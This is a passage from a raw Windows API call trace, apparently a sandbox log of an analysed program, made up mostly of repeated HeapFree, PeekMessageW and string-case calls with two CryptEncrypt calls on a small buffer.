hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.111] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.111] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.116] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.116] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.116] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.116] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.117] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.117] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.117] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.118] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.118] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.118] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.118] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.119] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0267.119] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.119] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.119] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.119] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.120] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0267.120] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3040 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.124] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x116, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x118) returned 1 [0267.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.125] CharLowerBuffW (in: lpsz="byte[280]", cchLength=0x9 | out: lpsz="byte[280]") returned 0x9 [0267.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.125] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.125] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.125] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.125] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.125] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.125] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b3040*, pdwDataLen=0x8bef68*=0x116, dwBufLen=0x118 | out: pbData=0x24b3040*, pdwDataLen=0x8bef68*=0x118) returned 1 [0267.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.126] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.126] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.126] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.126] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.126] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.126] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.127] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.127] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.127] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.127] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.127] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.127] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.128] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.128] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.129] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0267.129] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.129] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: 